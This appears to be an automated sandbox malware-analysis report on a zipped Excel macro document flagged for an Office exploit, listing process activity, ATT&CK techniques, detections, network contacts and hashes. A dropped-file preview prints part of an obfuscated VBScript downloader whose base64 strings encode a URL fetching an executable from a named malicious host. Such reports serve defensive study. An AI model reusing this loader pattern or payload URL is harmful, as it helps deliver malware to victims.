Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cscript.exe TID: 5964Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\cscript.exe TID: 2044Thread sleep time: -30000s >= -30000s
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information queried: ProcessInformation
Source: C:\Windows\SysWOW64\cscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information11
Scripting
Valid Accounts1
Exploitation for Client Execution
11
Scripting
1
Process Injection
1
Masquerading
OS Credential Dumping1
Process Discovery
Remote ServicesData from Local System2
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
DLL Side-Loading
1
DLL Side-Loading
11
Virtualization/Sandbox Evasion
LSASS Memory11
Virtualization/Sandbox Evasion
Remote Desktop ProtocolData from Removable Media1
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
Extra Window Memory Injection
1
Process Injection
Security Account Manager1
File and Directory Discovery
SMB/Windows Admin SharesData from Network Shared Drive2
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Rundll32
NTDS3
System Information Discovery
Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading
LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Extra Window Memory Injection
Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
7ccf88c0bbe3b29bf19d877c4596a8d4.zip19%VirustotalBrowse
7ccf88c0bbe3b29bf19d877c4596a8d4.zip13%ReversingLabsDocument-Office.Exploit.CVE-2017-11882
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
multiwaretecnologia.com.br
177.53.143.89
truetrue
    unknown
    s-part-0017.t-0009.t-msedge.net
    13.107.246.45
    truefalse
      high
      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs
      IPDomainCountryFlagASNASN NameMalicious
      52.113.194.132
      unknownUnited States
      8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
      20.189.173.14
      unknownUnited States
      8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
      52.109.28.46
      unknownUnited States
      8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
      13.107.246.45
      s-part-0017.t-0009.t-msedge.netUnited States
      8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
      177.53.143.89
      multiwaretecnologia.com.brBrazil
      53243BrasilSiteInformaticaLTDABRtrue
      23.56.254.164
      unknownUnited States
      42961GPRS-ASZAINKWfalse
      Joe Sandbox version:41.0.0 Charoite
      Analysis ID:1585741
      Start date and time:2025-01-08 07:12:35 +01:00
      Joe Sandbox product:CloudBasic
      Overall analysis duration:
      Hypervisor based Inspection enabled:false
      Report type:full
      Cookbook file name:defaultwindowsinteractivecookbook.jbs
      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
      Number of analysed new started processes analysed:21
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • EGA enabled
      Analysis Mode:stream
      Sample name:7ccf88c0bbe3b29bf19d877c4596a8d4.zip
      Detection:MAL
      Classification:mal84.expl.winZIP@14/2@1/67
      Cookbook Comments:
      • Found application associated with file extension: .zip
      • Exclude process from analysis (whitelisted): dllhost.exe
      • Excluded IPs from analysis (whitelisted): 52.109.28.46, 52.113.194.132, 23.56.254.164
      • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
      • Not all processes where analyzed, report is missing behavior information
      • Report size getting too big, too many NtOpenKeyEx calls found.
      • Report size getting too big, too many NtProtectVirtualMemory calls found.
      • Report size getting too big, too many NtQueryValueKey calls found.
      • VT rate limit hit for: multiwaretecnologia.com.br
      Process:C:\Windows\SysWOW64\cscript.exe
      File Type:HTML document, ASCII text
      Category:dropped
      Size (bytes):318
      Entropy (8bit):5.067491213927104
      Encrypted:false
      SSDEEP:
      MD5:FA172C77ABD7B03605D83CD1AE373657
      SHA1:9785FB3254695C25C621EB4CD81CF7A2A3C8258F
      SHA-256:B0C7E6712ECBF97A1E3A14F19E3AED5DBD6553F21A2852565BFC5518925713DB
      SHA-512:0E717CAA53962B18936301F4BAD2B5F818D74628B09399ADA500571FF9A7134017A1061DBE074C14AA2FCE728EE56A2D76422665F98C8A25FE7B70659CC75E45
      Malicious:false
      Reputation:unknown
      Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>403 Forbidden</title>.</head><body>.<h1>Forbidden</h1>.<p>You don't have permission to access this resource.</p>.<p>Additionally, a 403 Forbidden.error was encountered while trying to use an ErrorDocument to handle the request.</p>.</body></html>.
      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):60009
      Entropy (8bit):4.890758032366044
      Encrypted:false
      SSDEEP:
      MD5:6196CE936B2131935E89615965438ED4
      SHA1:5C3E5C8091139974FCA038E10FC92C7F6E91A053
      SHA-256:2EAA9D08D7E29C99D616AACCC4728F120E1E9A14816FECAB17F388665A89B6E4
      SHA-512:9505B721AC02DABBA69A4F38258CA2B8A98C9E19BB67BA3A5B97EE0BB7A76FE168CA28979B54034249705730040DF6C758FFCB35A97BDBDE5E1C6C03AA7B0670
      Malicious:false
      Reputation:unknown
      Preview:vrh5kryyj4kiwq6ui = "kk"..vrh5kryyj4kiwq6ui = "xbraHRUcHM6Ly9tdWx0aXdhcmV0ZWNub2xvZ2lhLmNvbS5ici9qcy9Qb2RhbGlyaTQuZXhl" ..vrh5kryyj4kiwq6ui = Mid(vrh5kryyj4kiwq6ui, 4)..uiytvdverwt67fhrey ="gy5UG9kYWxpcmk0LmV4ZQ==".. lifwjifwbyg8dsi9jf35hu4ifdg3yuie3 = "-47345+9551*3026-2906*6579-6478*5111-5012*1036386/8858*3472-3356*501970/4970*9975-9935*489405/4661*471900/4290*745360/6655*1098513/9389*773952/6672*5785-5707*9133-9016*486467/4463*866712/8844*1273-1172*-868+982*-3344+3395*-8034+8085*-5866+5907".. lifwjifwbyg8dsi9jf35hu4ifdg3yuie3 = "-47345+9551*3026-2906*6579-6478*5111-5012*1036386/8858*3472-3356*501970/4970*9975-9935*489405/4661*471900/4290*745360/6655*1098513/9389*773952/6672*5785-5707*9133-9016*486467/4463*866712/8844*1273-1172*-868+982*-3344+3395*-8034+8085*-5866+5907".. lifwjifwbyg8dsi9jf35hu4ifdg3yuie3 = "-47345+9551*3026-2906*6579-6478*5111-5012*1036386/8858*3472-3356*501970/4970*9975-9935*489405/4661*471900/4290*745360/6655*1098513/9389*773952/66
      File type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Entropy (8bit):7.996879364876171
      TrID:
      • ZIP compressed archive (8000/1) 100.00%
      File name:7ccf88c0bbe3b29bf19d877c4596a8d4.zip
      File size:69'412 bytes
      MD5:adee407a5d9f4425707fe5bd4c25aa14
      SHA1:5a99f6b3b106daf23ba2c29f2ff94cb118703414
      SHA256:a53db45f1d4a2f36ebc0b0e268d2073baba89ca6c1d05fe9a06ef395e8658a51
      SHA512:ba5a20cb904c3964e8db737a2814cfaea6497b0b23e5d8f1eef331fede066369f220e93e639b7a741e66ccaa0daf1ee481199c11ef93fd21422622d8dc5c50d3
      SSDEEP:1536:jjaEudvK51sOagtBDPihqGGJRvbB8lmAqQap28rxmQ3wIUG7ChXtZlYGdf:jejdvK17JKhqNjv3p2oxzw67CVtZlYi
      TLSH:1F6302C46788CD3B42D0CDB9E632137D109EAB32517D14B616C9F25EBD562E81AD3CE0
      File Content Preview:PK..........nR.X.+p.....*.....ORDER SHEET & SPEC.xlsm.......}.t$Y4.....z3..J.0s:.....M~k.6F..n.D......h.(.1.m.f7w.............u..su..V.G.U.U..u..:mXI....(F.'.._G.W...E...OS.q..B!..Kq.u....We....#8.....P.A.t....fi.&......j^..k.).Ii......2`_...j..x.z.<.....
      Icon Hash:1c1c1e4e4ececedc